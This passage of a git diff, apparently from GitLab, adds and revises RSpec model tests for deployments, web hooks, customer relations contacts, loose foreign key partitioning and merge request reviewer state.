repository_creation_race(path) + # create a race condition - structure from https://blog.arkency.com/2015/09/testing-race-conditions/ + wait_for_it = true + + threads = Array.new(10) do |i| + Thread.new do + true while wait_for_it + + ::ContainerRepository.find_or_create_from_path(path) + end + end + wait_for_it = false + threads.each(&:join) + end end describe '.build_root_repository' do diff --git a/spec/models/customer_relations/contact_spec.rb b/spec/models/customer_relations/contact_spec.rb index 3a2d4e2d0ca..7e26d324ac2 100644 --- a/spec/models/customer_relations/contact_spec.rb +++ b/spec/models/customer_relations/contact_spec.rb @@ -36,4 +36,27 @@ RSpec.describe CustomerRelations::Contact, type: :model do expect(contact.phone).to eq('123456') end end + + describe '#self.find_ids_by_emails' do + let_it_be(:group) { create(:group) } + let_it_be(:group_contacts) { create_list(:contact, 2, group: group) } + let_it_be(:other_contacts) { create_list(:contact, 2) } + + it 'returns ids of contacts from group' do + contact_ids = described_class.find_ids_by_emails(group.id, group_contacts.pluck(:email)) + + expect(contact_ids).to match_array(group_contacts.pluck(:id)) + end + + it 'does not return ids of contacts from other groups' do + contact_ids = described_class.find_ids_by_emails(group.id, other_contacts.pluck(:email)) + + expect(contact_ids).to be_empty + end + + it 'raises ArgumentError when called with too many emails' do + too_many_emails = described_class::MAX_PLUCK + 1 + expect { described_class.find_ids_by_emails(group.id, Array(0..too_many_emails)) }.to raise_error(ArgumentError) + end + end end diff --git a/spec/models/customer_relations/issue_contact_spec.rb b/spec/models/customer_relations/issue_contact_spec.rb index 3747d159833..474455a9884 100644 --- a/spec/models/customer_relations/issue_contact_spec.rb +++ b/spec/models/customer_relations/issue_contact_spec.rb @@ -4,6 +4,9 @@ require 'spec_helper' RSpec.describe CustomerRelations::IssueContact do let_it_be(:issue_contact, reload: true) { create(:issue_customer_relations_contact) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:issue) { create(:issue, project: project) } subject { issue_contact } @@ -19,9 +22,6 @@ RSpec.describe CustomerRelations::IssueContact do let(:stubbed) { build_stubbed(:issue_customer_relations_contact) } let(:created) { create(:issue_customer_relations_contact) } - let(:group) { build(:group) } - let(:project) { build(:project, group: group) } - let(:issue) { build(:issue, project: project) } let(:contact) { build(:contact, group: group) } let(:for_issue) { build(:issue_customer_relations_contact, :for_issue, issue: issue) } let(:for_contact) { build(:issue_customer_relations_contact, :for_contact, contact: contact) } @@ -45,4 +45,26 @@ RSpec.describe CustomerRelations::IssueContact do expect(built).not_to be_valid end end + + describe '#self.find_contact_ids_by_emails' do + let_it_be(:for_issue) { create_list(:issue_customer_relations_contact, 2, :for_issue, issue: issue) } + let_it_be(:not_for_issue) { create_list(:issue_customer_relations_contact, 2) } + + it 'returns ids of contacts from issue' do + contact_ids = described_class.find_contact_ids_by_emails(issue.id, for_issue.map(&:contact).pluck(:email)) + + expect(contact_ids).to match_array(for_issue.pluck(:contact_id)) + end + + it 'does not return ids of contacts from other issues' do + contact_ids = described_class.find_contact_ids_by_emails(issue.id, not_for_issue.map(&:contact).pluck(:email)) + + expect(contact_ids).to be_empty + end + + it 'raises ArgumentError when called with too many emails' do + too_many_emails = described_class::MAX_PLUCK + 1 + expect { described_class.find_contact_ids_by_emails(issue.id, Array(0..too_many_emails)) }.to raise_error(ArgumentError) + end + end end diff --git a/spec/models/deployment_metrics_spec.rb b/spec/models/deployment_metrics_spec.rb index c804e20d66d..fe9218a9ae2 100644 --- a/spec/models/deployment_metrics_spec.rb +++ b/spec/models/deployment_metrics_spec.rb @@ -111,7 +111,7 @@ RSpec.describe DeploymentMetrics do } end - let(:prometheus_adapter) { instance_double('prometheus_adapter', can_query?: true, configured?: true) } + let(:prometheus_adapter) { instance_double(::Integrations::Prometheus, can_query?: true, configured?: true) } before do allow(deployment_metrics).to receive(:prometheus_adapter).and_return(prometheus_adapter) diff --git a/spec/models/deployment_spec.rb b/spec/models/deployment_spec.rb index 51e1e63da8d..29b37ef7371 100644 --- a/spec/models/deployment_spec.rb +++ b/spec/models/deployment_spec.rb @@ -268,31 +268,69 @@ RSpec.describe Deployment do end end + context 'when deployment is blocked' do + let(:deployment) { create(:deployment, :created) } + + it 'has correct status' do + deployment.block! + + expect(deployment).to be_blocked + expect(deployment.finished_at).to be_nil + end + + it 'does not execute Deployments::LinkMergeRequestWorker asynchronously' do + expect(Deployments::LinkMergeRequestWorker).not_to receive(:perform_async) + + deployment.block! + end + + it 'does not execute Deployments::HooksWorker' do + expect(Deployments::HooksWorker).not_to receive(:perform_async) + + deployment.block! + end + end + describe 'synching status to Jira' do - let(:deployment) { create(:deployment) } + let_it_be(:project) { create(:project, :repository) } + let(:deployment) { create(:deployment, project: project) } let(:worker) { ::JiraConnect::SyncDeploymentsWorker } - it 'calls the worker on creation' do - expect(worker).to receive(:perform_async).with(Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not call the worker' do + expect(worker).not_to receive(:perform_async) - deployment + deployment + end end - it 'does not call the worker for skipped deployments' do - expect(deployment).to be_present # warm-up, ignore the creation trigger + context 'when Jira Connect subscription exists' do + before_all do + create(:jira_connect_subscription, namespace: project.namespace) + end - expect(worker).not_to receive(:perform_async) + it 'calls the worker on creation' do + expect(worker).to receive(:perform_async).with(Integer) - deployment.skip! - end + deployment + end + + it 'does not call the worker for skipped deployments' do + expect(deployment).to be_present # warm-up, ignore the creation trigger + + expect(worker).not_to receive(:perform_async) + + deployment.skip! + end - %i[run! succeed! drop! cancel!].each do |event| - context "when we call pipeline.#{event}" do - it 'triggers a Jira synch worker' do - expect(worker).to receive(:perform_async).with(deployment.id) + %i[run! succeed! drop! cancel!].each do |event| + context "when we call pipeline.#{event}" do + it 'triggers a Jira synch worker' do + expect(worker).to receive(:perform_async).with(deployment.id) - deployment.send(event) + deployment.send(event) + end end end end @@ -448,11 +486,12 @@ RSpec.describe Deployment do subject { described_class.active } it 'retrieves the active deployments' do - deployment1 = create(:deployment, status: :created ) - deployment2 = create(:deployment, status: :running ) - create(:deployment, status: :failed ) - create(:deployment, status: :canceled ) + deployment1 = create(:deployment, status: :created) + deployment2 = create(:deployment, status: :running) + create(:deployment, status: :failed) + create(:deployment, status: :canceled) create(:deployment, status: :skipped) + create(:deployment, status: :blocked) is_expected.to contain_exactly(deployment1, deployment2) end @@ -512,9 +551,25 @@ RSpec.describe Deployment do deployment2 = create(:deployment, status: :success) deployment3 = create(:deployment, status: :failed) deployment4 = create(:deployment, status: :canceled) + deployment5 = create(:deployment, status: :blocked) + create(:deployment, status: :skipped) + + is_expected.to contain_exactly(deployment1, deployment2, deployment3, deployment4, deployment5) + end + end + + describe 'upcoming' do + subject { described_class.upcoming } + + it 'retrieves the upcoming deployments' do + deployment1 = create(:deployment, status: :running) + deployment2 = create(:deployment, status: :blocked) + create(:deployment, status: :success) + create(:deployment, status: :failed) + create(:deployment, status: :canceled) create(:deployment, status: :skipped) - is_expected.to contain_exactly(deployment1, deployment2, deployment3, deployment4) + is_expected.to contain_exactly(deployment1, deployment2) end end end @@ -840,6 +895,27 @@ RSpec.describe Deployment do expect(deploy.update_status('created')).to eq(false) end + + context 'mapping status to event' do + using RSpec::Parameterized::TableSyntax + + where(:status, :method) do + 'running' | :run! + 'success' | :succeed! + 'failed' | :drop! + 'canceled' | :cancel! + 'skipped' | :skip! + 'blocked' | :block! + end + + with_them do + it 'calls the correct method for the given status' do + expect(deploy).to receive(method) + + deploy.update_status(status) + end + end + end end describe '#sync_status_with' do diff --git a/spec/models/dev_ops_report/metric_spec.rb b/spec/models/dev_ops_report/metric_spec.rb index 191692f43a4..8519217f719 100644 --- a/spec/models/dev_ops_report/metric_spec.rb +++ b/spec/models/dev_ops_report/metric_spec.rb @@ -5,6 +5,13 @@ require 'spec_helper' RSpec.describe DevOpsReport::Metric do let(:conv_dev_index) { create(:dev_ops_report_metric) } + describe 'validations' do + DevOpsReport::Metric::METRICS.each do |metric_name| + it { is_expected.to validate_presence_of(metric_name) } + it { is_expected.to validate_numericality_of(metric_name).is_greater_than_or_equal_to(0) } + end + end + describe '#percentage_score' do it 'returns stored percentage score' do expect(conv_dev_index.percentage_score('issues')).to eq(13.331) diff --git a/spec/models/environment_spec.rb b/spec/models/environment_spec.rb index 9d9862aa3d3..3dd0e01d7b3 100644 --- a/spec/models/environment_spec.rb +++ b/spec/models/environment_spec.rb @@ -947,6 +947,12 @@ RSpec.describe Environment, :use_clean_rails_memory_store_caching do it { is_expected.to eq(deployment) } end + + context 'when environment has a blocked deployment' do + let!(:deployment) { create(:deployment, :blocked, environment: environment, project: project) } + + it { is_expected.to eq(deployment) } + end end describe '#has_terminals?' do diff --git a/spec/models/event_spec.rb b/spec/models/event_spec.rb index ee27eaf1d0b..97854086162 100644 --- a/spec/models/event_spec.rb +++ b/spec/models/event_spec.rb @@ -706,7 +706,7 @@ RSpec.describe Event do describe '.for_wiki_meta' do it 'finds events for a given wiki page metadata object' do - event = events.select(&:wiki_page?).first + event = events.find(&:wiki_page?) expect(described_class.for_wiki_meta(event.target)).to contain_exactly(event) end diff --git a/spec/models/external_pull_request_spec.rb b/spec/models/external_pull_request_spec.rb index bac2c369d7d..b141600c4fd 100644 --- a/spec/models/external_pull_request_spec.rb +++ b/spec/models/external_pull_request_spec.rb @@ -232,4 +232,8 @@ RSpec.describe ExternalPullRequest do 'with space/README.md'] end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :external_pull_request } + end end diff --git a/spec/models/group_spec.rb b/spec/models/group_spec.rb index 735aa4df2ba..fed4ee3f3a4 100644 --- a/spec/models/group_spec.rb +++ b/spec/models/group_spec.rb @@ -94,34 +94,6 @@ RSpec.describe Group do expect(group).to be_valid end end - - context 'when the feature flag `validate_namespace_parent_type` is disabled' do - before do - stub_feature_flags(validate_namespace_parent_type: false) - end - - context 'when the group has no parent' do - it 'allows a group to have no parent associated with it' do - group = build(:group) - - expect(group).to be_valid - end - end - - context 'when the group has a parent' do - it 'allows a group to have a namespace as its parent' do - group = build(:group, parent: build(:namespace)) - - expect(group).to be_valid - end - - it 'allows a group to have another group as its parent' do - group = build(:group, parent: build(:group)) - - expect(group).to be_valid - end - end - end end describe 'path validation' do @@ -533,6 +505,10 @@ RSpec.describe Group do describe '#ancestors' do it { expect(group.ancestors.to_sql).not_to include 'traversal_ids <@' } end + + describe '#ancestors_upto' do + it { expect(group.ancestors_upto.to_sql).not_to include "WITH ORDINALITY" } + end end context 'linear' do @@ -566,6 +542,10 @@ RSpec.describe Group do end end + describe '#ancestors_upto' do + it { expect(group.ancestors_upto.to_sql).to include "WITH ORDINALITY" } + end + context 'when project namespace exists in the group' do let!(:project) { create(:project, group: group) } let!(:project_namespace) { project.project_namespace } @@ -734,7 +714,6 @@ RSpec.describe Group do let!(:project) { create(:project, group: group) } before do - stub_experiments(invite_members_for_task: true) group.add_users([create(:user)], :developer, tasks_to_be_done: %w(ci code), tasks_project_id: project.id) end @@ -2317,14 +2296,6 @@ RSpec.describe Group do end it_behaves_like 'returns the expected groups for a group and its descendants' - - context 'when :linear_group_including_descendants_by feature flag is disabled' do - before do - stub_feature_flags(linear_group_including_descendants_by: false) - end - - it_behaves_like 'returns the expected groups for a group and its descendants' - end end describe '.preset_root_ancestor_for' do diff --git a/spec/models/hooks/web_hook_spec.rb b/spec/models/hooks/web_hook_spec.rb index 59f4533a6c1..c292e78b32d 100644 --- a/spec/models/hooks/web_hook_spec.rb +++ b/spec/models/hooks/web_hook_spec.rb @@ -330,6 +330,20 @@ RSpec.describe WebHook do expect { hook.backoff! }.to change(hook, :backoff_count).by(1) end + context 'when the hook is permanently disabled' do + before do + allow(hook).to receive(:permanently_disabled?).and_return(true) + end + + it 'does not set disabled_until' do + expect { hook.backoff! }.not_to change(hook, :disabled_until) + end + + it 'does not increment the backoff count' do + expect { hook.backoff! }.not_to change(hook, :backoff_count) + end + end + context 'when we have backed off MAX_FAILURES times' do before do stub_const("#{described_class}::MAX_FAILURES", 5) @@ -392,4 +406,77 @@ RSpec.describe WebHook do end end end + + describe '#temporarily_disabled?' do + it 'is false when not temporarily disabled' do + expect(hook).not_to be_temporarily_disabled + end + + context 'when hook has been told to back off' do + before do + hook.backoff! + end + + it 'is true' do + expect(hook).to be_temporarily_disabled + end + + it 'is false when `web_hooks_disable_failed` flag is disabled' do + stub_feature_flags(web_hooks_disable_failed: false) + + expect(hook).not_to be_temporarily_disabled + end + end + end + + describe '#permanently_disabled?' do + it 'is false when not disabled' do + expect(hook).not_to be_permanently_disabled + end + + context 'when hook has been disabled' do + before do + hook.disable! + end + + it 'is true' do + expect(hook).to be_permanently_disabled + end + + it 'is false when `web_hooks_disable_failed` flag is disabled' do + stub_feature_flags(web_hooks_disable_failed: false) + + expect(hook).not_to be_permanently_disabled + end + end + end + + describe '#rate_limited?' do + context 'when there are rate limits' do + before do + allow(hook).to receive(:rate_limit).and_return(3) + end + + it 'is false when hook has not been rate limited' do + expect(Gitlab::ApplicationRateLimiter).to receive(:peek).and_return(false) + expect(hook).not_to be_rate_limited + end + + it 'is true when hook has been rate limited' do + expect(Gitlab::ApplicationRateLimiter).to receive(:peek).and_return(true) + expect(hook).to be_rate_limited + end + end + + context 'when there are no rate limits' do + before do + allow(hook).to receive(:rate_limit).and_return(nil) + end + + it 'does not call Gitlab::ApplicationRateLimiter, and is false' do + expect(Gitlab::ApplicationRateLimiter).not_to receive(:peek) + expect(hook).not_to be_rate_limited + end + end + end end diff --git a/spec/models/incident_management/issuable_escalation_status_spec.rb b/spec/models/incident_management/issuable_escalation_status_spec.rb index f3e7b90cf3c..c548357bd3f 100644 --- a/spec/models/incident_management/issuable_escalation_status_spec.rb +++ b/spec/models/incident_management/issuable_escalation_status_spec.rb @@ -11,6 +11,7 @@ RSpec.describe IncidentManagement::IssuableEscalationStatus do describe 'associations' do it { is_expected.to belong_to(:issue) } + it { is_expected.to have_one(:project).through(:issue) } end describe 'validatons' do diff --git a/spec/models/instance_configuration_spec.rb b/spec/models/instance_configuration_spec.rb index cc0b69e3526..698d74abf03 100644 --- a/spec/models/instance_configuration_spec.rb +++ b/spec/models/instance_configuration_spec.rb @@ -144,6 +144,7 @@ RSpec.describe InstanceConfiguration do create(:plan_limits, plan: plan1, conan_max_file_size: 1001, + helm_max_file_size: 1008, maven_max_file_size: 1002, npm_max_file_size: 1003, nuget_max_file_size: 1004, @@ -154,6 +155,7 @@ RSpec.describe InstanceConfiguration do create(:plan_limits, plan: plan2, conan_max_file_size: 1101, + helm_max_file_size: 1108, maven_max_file_size: 1102, npm_max_file_size: 1103, nuget_max_file_size: 1104, @@ -166,8 +168,8 @@ RSpec.describe InstanceConfiguration do it 'returns package file size limits' do file_size_limits = subject.settings[:package_file_size_limits] - expect(file_size_limits[:Plan1]).to eq({ conan: 1001, maven: 1002, npm: 1003, nuget: 1004, pypi: 1005, terraform_module: 1006, generic: 1007 }) - expect(file_size_limits[:Plan2]).to eq({ conan: 1101, maven: 1102, npm: 1103, nuget: 1104, pypi: 1105, terraform_module: 1106, generic: 1107 }) + expect(file_size_limits[:Plan1]).to eq({ conan: 1001, helm: 1008, maven: 1002, npm: 1003, nuget: 1004, pypi: 1005, terraform_module: 1006, generic: 1007 }) + expect(file_size_limits[:Plan2]).to eq({ conan: 1101, helm: 1108, maven: 1102, npm: 1103, nuget: 1104, pypi: 1105, terraform_module: 1106, generic: 1107 }) end end diff --git a/spec/models/integrations/jira_spec.rb b/spec/models/integrations/jira_spec.rb index 1d81668f97d..9163a7ef845 100644 --- a/spec/models/integrations/jira_spec.rb +++ b/spec/models/integrations/jira_spec.rb @@ -863,7 +863,7 @@ RSpec.describe Integrations::Jira do subject { jira_integration.create_cross_reference_note(jira_issue, resource, user) } shared_examples 'handles cross-references' do - let(:resource_name) { jira_integration.send(:noteable_name, resource) } + let(:resource_name) { jira_integration.send(:mentionable_name, resource) } let(:resource_url) { jira_integration.send(:build_entity_url, resource_name, resource.to_param) } let(:issue_url) { "#{url}/rest/api/2/issue/JIRA-123" } let(:comment_url) { "#{issue_url}/comment" } diff --git a/spec/models/integrations/microsoft_teams_spec.rb b/spec/models/integrations/microsoft_teams_spec.rb index 21b9a005746..06b285a855c 100644 --- a/spec/models/integrations/microsoft_teams_spec.rb +++ b/spec/models/integrations/microsoft_teams_spec.rb @@ -3,6 +3,17 @@ require 'spec_helper' RSpec.describe Integrations::MicrosoftTeams do + it_behaves_like "chat integration", "Microsoft Teams" do + let(:client) { ::MicrosoftTeams::Notifier } + let(:client_arguments) { webhook_url } + + let(:payload) do + { + summary: be_present + } + end + end + let(:chat_integration) { described_class.new } let(:webhook_url) { 'https://example.gitlab.com/' } @@ -304,7 +315,7 @@ RSpec.describe Integrations::MicrosoftTeams do context 'with protected branch' do before do - create(:protected_branch, project: project, name: 'a-protected-branch') + create(:protected_branch, :create_branch_on_repository, project: project, name: 'a-protected-branch') end let(:pipeline) do diff --git a/spec/models/integrations/shimo_spec.rb b/spec/models/integrations/shimo_spec.rb index 25df8d2b249..41f3f3c0c16 100644 --- a/spec/models/integrations/shimo_spec.rb +++ b/spec/models/integrations/shimo_spec.rb @@ -38,4 +38,26 @@ RSpec.describe ::Integrations::Shimo do end end end + + describe 'Caching has_shimo on project_settings' do + let(:project) { create(:project) } + + subject { project.project_setting.has_shimo? } + + it 'sets the property to true when integration is active' do + create(:shimo_integration, project: project, active: true) + + is_expected.to be(true) + end + + it 'sets the property to false when integration is not active' do + create(:shimo_integration, project: project, active: false) + + is_expected.to be(false) + end + + it 'creates a project_setting record if one was not already created' do + expect { create(:shimo_integration) }.to change(ProjectSetting, :count).by(1) + end + end end diff --git a/spec/models/issue/email_spec.rb b/spec/models/issue/email_spec.rb new file mode 100644 index 00000000000..57cc7c7df66 --- /dev/null +++ b/spec/models/issue/email_spec.rb @@ -0,0 +1,19 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Issue::Email do + describe 'Associations' do + it { is_expected.to belong_to(:issue) } + end + + describe 'Validations' do + subject { build(:issue_email) } + + it { is_expected.to validate_presence_of(:issue) } + it { is_expected.to validate_uniqueness_of(:issue) } + it { is_expected.to validate_uniqueness_of(:email_message_id) } + it { is_expected.to validate_length_of(:email_message_id).is_at_most(1000) } + it { is_expected.to validate_presence_of(:email_message_id) } + end +end diff --git a/spec/models/issue_spec.rb b/spec/models/issue_spec.rb index ba4429451d1..4cbfa7c7758 100644 --- a/spec/models/issue_spec.rb +++ b/spec/models/issue_spec.rb @@ -32,6 +32,7 @@ RSpec.describe Issue do it { is_expected.to have_and_belong_to_many(:self_managed_prometheus_alert_events) } it { is_expected.to have_many(:prometheus_alerts) } it { is_expected.to have_many(:issue_email_participants) } + it { is_expected.to have_one(:email) } it { is_expected.to have_many(:timelogs).autosave(true) } it { is_expected.to have_one(:incident_management_issuable_escalation_status) } it { is_expected.to have_many(:issue_customer_relations_contacts) } @@ -986,6 +987,7 @@ RSpec.describe Issue do issue = build(:issue, project: project) user = build(:user) + allow(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label', project.full_path).and_call_original expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false } expect(issue.visible_to_user?(user)).to be_falsy end @@ -1019,6 +1021,7 @@ RSpec.describe Issue do issue = build(:issue, project: project) user = build(:admin) + allow(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label', project.full_path).and_call_original expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false } expect(issue.visible_to_user?(user)).to be_falsy end @@ -1314,10 +1317,28 @@ RSpec.describe Issue do let_it_be(:issue1) { create(:issue, project: project, relative_position: nil) } let_it_be(:issue2) { create(:issue, project: project, relative_position: nil) } - it_behaves_like "a class that supports relative positioning" do - let_it_be(:project) { reusable_project } - let(:factory) { :issue } - let(:default_params) { { project: project } } + context 'when optimized_issue_neighbor_queries is enabled' do + before do + stub_feature_flags(optimized_issue_neighbor_queries: true) + end + + it_behaves_like "a class that supports relative positioning" do + let_it_be(:project) { reusable_project } + let(:factory) { :issue } + let(:default_params) { { project: project } } + end + end + + context 'when optimized_issue_neighbor_queries is disabled' do + before do + stub_feature_flags(optimized_issue_neighbor_queries: false) + end + + it_behaves_like "a class that supports relative positioning" do + let_it_be(:project) { reusable_project } + let(:factory) { :issue } + let(:default_params) { { project: project } } + end end it 'is not blocked for repositioning by default' do @@ -1461,7 +1482,7 @@ RSpec.describe Issue do it 'schedules rebalancing if there is no space left' do lhs = build_stubbed(:issue, relative_position: 99, project: project) to_move = build(:issue, project: project) - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, project_id, namespace_id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, project_id, namespace_id) expect { to_move.move_between(lhs, issue) }.to raise_error(RelativePositioning::NoSpaceLeft) end diff --git a/spec/models/lfs_objects_project_spec.rb b/spec/models/lfs_objects_project_spec.rb index df49b60c4fa..7378beeed06 100644 --- a/spec/models/lfs_objects_project_spec.rb +++ b/spec/models/lfs_objects_project_spec.rb @@ -25,6 +25,28 @@ RSpec.describe LfsObjectsProject do end end + describe '#link_to_project!' do + it 'does not throw error when duplicate exists' do + subject + + expect do + result = described_class.link_to_project!(subject.lfs_object, subject.project) + expect(result).to be_a(LfsObjectsProject) + end.not_to change { described_class.count } + end + + it 'upserts a new entry and updates the project cache' do + new_project = create(:project) + + allow(ProjectCacheWorker).to receive(:perform_async).and_call_original + expect(ProjectCacheWorker).to receive(:perform_async).with(new_project.id, [], [:lfs_objects_size]) + expect { described_class.link_to_project!(subject.lfs_object, new_project) } + .to change { described_class.count } + + expect(described_class.find_by(lfs_object_id: subject.lfs_object.id, project_id: new_project.id)).to be_present + end + end + describe '#update_project_statistics' do it 'updates project statistics when the object is added' do expect(ProjectCacheWorker).to receive(:perform_async) diff --git a/spec/models/loose_foreign_keys/deleted_record_spec.rb b/spec/models/loose_foreign_keys/deleted_record_spec.rb index cd5068bdb52..07ffff746a5 100644 --- a/spec/models/loose_foreign_keys/deleted_record_spec.rb +++ b/spec/models/loose_foreign_keys/deleted_record_spec.rb @@ -5,31 +5,148 @@ require 'spec_helper' RSpec.describe LooseForeignKeys::DeletedRecord, type: :model do let_it_be(:table) { 'public.projects' } - let_it_be(:deleted_record_1) { described_class.create!(partition: 1, fully_qualified_table_name: table, primary_key_value: 5) } - let_it_be(:deleted_record_2) { described_class.create!(partition: 1, fully_qualified_table_name: table, primary_key_value: 1) } - let_it_be(:deleted_record_3) { described_class.create!(partition: 1, fully_qualified_table_name: 'public.other_table', primary_key_value: 3) } - let_it_be(:deleted_record_4) { described_class.create!(partition: 1, fully_qualified_table_name: table, primary_key_value: 1) } # duplicate + describe 'class methods' do + let_it_be(:deleted_record_1) { described_class.create!(fully_qualified_table_name: table, primary_key_value: 5) } + let_it_be(:deleted_record_2) { described_class.create!(fully_qualified_table_name: table, primary_key_value: 1) } + let_it_be(:deleted_record_3) { described_class.create!(fully_qualified_table_name: 'public.other_table', primary_key_value: 3) } + let_it_be(:deleted_record_4) { described_class.create!(fully_qualified_table_name: table, primary_key_value: 1) } # duplicate - describe '.load_batch_for_table' do - it 'loads records and orders them by creation date' do - records = described_class.load_batch_for_table(table, 10) + describe '.load_batch_for_table' do + it 'loads records and orders them by creation date' do + records = described_class.load_batch_for_table(table, 10) - expect(records).to eq([deleted_record_1, deleted_record_2, deleted_record_4]) + expect(records).to eq([deleted_record_1, deleted_record_2, deleted_record_4]) + end + + it 'supports configurable batch size' do + records = described_class.load_batch_for_table(table, 2) + + expect(records).to eq([deleted_record_1, deleted_record_2]) + end end - it 'supports configurable batch size' do - records = described_class.load_batch_for_table(table, 2) + describe '.mark_records_processed' do + it 'updates all records' do + records = described_class.load_batch_for_table(table, 10) + described_class.mark_records_processed(records) - expect(records).to eq([deleted_record_1, deleted_record_2]) + expect(described_class.status_pending.count).to eq(1) + expect(described_class.status_processed.count).to eq(3) + end end end - describe '.mark_records_processed' do - it 'updates all records' do - described_class.mark_records_processed([deleted_record_1, deleted_record_2, deleted_record_4]) + describe 'sliding_list partitioning' do + let(:connection) { described_class.connection } + let(:partition_manager) { Gitlab::Database::Partitioning::PartitionManager.new(described_class) } + + describe 'next_partition_if callback' do + let(:active_partition) { described_class.partitioning_strategy.active_partition.value } + + subject(:value) { described_class.partitioning_strategy.next_partition_if.call(active_partition) } + + context 'when the partition is empty' do + it { is_expected.to eq(false) } + end + + context 'when the partition has records' do + before do + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1, status: :processed) + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2, status: :pending) + end + + it { is_expected.to eq(false) } + end + + context 'when the first record of the partition is older than PARTITION_DURATION' do + before do + described_class.create!( + fully_qualified_table_name: 'public.table', + primary_key_value: 1, + created_at: (described_class::PARTITION_DURATION + 1.day).ago) + + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2) + end + + it { is_expected.to eq(true) } + + context 'when the lfk_automatic_partition_creation FF is off' do + before do + stub_feature_flags(lfk_automatic_partition_creation: false) + end + + it { is_expected.to eq(false) } + end + end + end + + describe 'detach_partition_if callback' do + let(:active_partition) { described_class.partitioning_strategy.active_partition.value } + + subject(:value) { described_class.partitioning_strategy.detach_partition_if.call(active_partition) } + + context 'when the partition contains unprocessed records' do + before do + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1, status: :processed) + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2, status: :pending) + end + + it { is_expected.to eq(false) } + end + + context 'when the partition contains only processed records' do + before do + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1, status: :processed) + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2, status: :processed) + end + + it { is_expected.to eq(true) } + + context 'when the lfk_automatic_partition_dropping FF is off' do + before do + stub_feature_flags(lfk_automatic_partition_dropping: false) + end + + it { is_expected.to eq(false) } + end + end + end + + describe 'the behavior of the strategy' do + it 'moves records to new partitions as time passes', :freeze_time do + # We start with partition 1 + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([1]) + + # it's not a day old yet so no new partitions are created + partition_manager.sync_partitions + + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([1]) + + # add one record so the next partition will be created + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1) + + # after traveling forward a day + travel(described_class::PARTITION_DURATION + 1.second) + + # a new partition is created + partition_manager.sync_partitions + + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([1, 2]) + + # and we can insert to the new partition + expect { described_class.create!(fully_qualified_table_name: table, primary_key_value: 5) }.not_to raise_error + + # after processing old records + LooseForeignKeys::DeletedRecord.for_partition(1).update_all(status: :processed) + + partition_manager.sync_partitions + + # the old one is removed + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([2]) - expect(described_class.status_pending.count).to eq(1) - expect(described_class.status_processed.count).to eq(3) + # and we only have the newly created partition left. + expect(described_class.count).to eq(1) + end end end end diff --git a/spec/models/member_spec.rb b/spec/models/member_spec.rb index abff1815f1a..7ce32de6edc 100644 --- a/spec/models/member_spec.rb +++ b/spec/models/member_spec.rb @@ -681,8 +681,6 @@ RSpec.describe Member do end it 'schedules a TasksToBeDone::CreateWorker task' do - stub_experiments(invite_members_for_task: true) - member_task = create(:member_task, member: member, project: member.project) expect(TasksToBeDone::CreateWorker) diff --git a/spec/models/merge_request/metrics_spec.rb b/spec/models/merge_request/metrics_spec.rb index 13ff239a306..a4bdac39074 100644 --- a/spec/models/merge_request/metrics_spec.rb +++ b/spec/models/merge_request/metrics_spec.rb @@ -48,4 +48,10 @@ RSpec.describe MergeRequest::Metrics do end end end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:merge_request) { create(:merge_request) } + let!(:parent) { create(:ci_pipeline, project: merge_request.target_project) } + let!(:model) { merge_request.metrics.tap { |metrics| metrics.update!(pipeline: parent) } } + end end diff --git a/spec/models/merge_request_assignee_spec.rb b/spec/models/merge_request_assignee_spec.rb index 5bb8e7184a3..58b802de8e0 100644 --- a/spec/models/merge_request_assignee_spec.rb +++ b/spec/models/merge_request_assignee_spec.rb @@ -3,9 +3,10 @@ require 'spec_helper' RSpec.describe MergeRequestAssignee do + let(:assignee) { create(:user) } let(:merge_request) { create(:merge_request) } - subject { merge_request.merge_request_assignees.build(assignee: create(:user)) } + subject { merge_request.merge_request_assignees.build(assignee: assignee) } describe 'associations' do it { is_expected.to belong_to(:merge_request).class_name('MergeRequest') } @@ -41,4 +42,13 @@ RSpec.describe MergeRequestAssignee do it_behaves_like 'having unique enum values' it_behaves_like 'having reviewer state' + + describe 'syncs to reviewer state' do + before do + reviewer = merge_request.merge_request_reviewers.build(reviewer: assignee) + reviewer.update!(state: :reviewed) + end + + it { is_expected.to have_attributes(state: 'reviewed') } + end end diff --git a/spec/models/merge_request_reviewer_spec.rb b/spec/models/merge_request_reviewer_spec.rb index d69d60c94f0..d99fd4afb0f 100644 --- a/spec/models/merge_request_reviewer_spec.rb +++ b/spec/models/merge_request_reviewer_spec.rb @@ -3,14 +3,24 @@ require 'spec_helper' RSpec.describe MergeRequestReviewer do + let(:reviewer) { create(:user) } let(:merge_request) { create(:merge_request) } - subject { merge_request.merge_request_reviewers.build(reviewer: create(:user)) } + subject { merge_request.merge_request_reviewers.build(reviewer: reviewer) } it_behaves_like 'having unique enum values' it_behaves_like 'having reviewer state' + describe 'syncs to assignee state' do + before do + assignee = merge_request.merge_request_assignees.build(assignee: reviewer) + assignee.update!(state: :reviewed) + end + + it { is_expected.to have_attributes(state: 'reviewed') } + end + describe 'associations' do it { is_expected.to belong_to(:merge_request).class_name('MergeRequest') } it { is_expected.to belong_to(:reviewer).class_name('User').inverse_of(:merge_request_reviewers) } diff --git 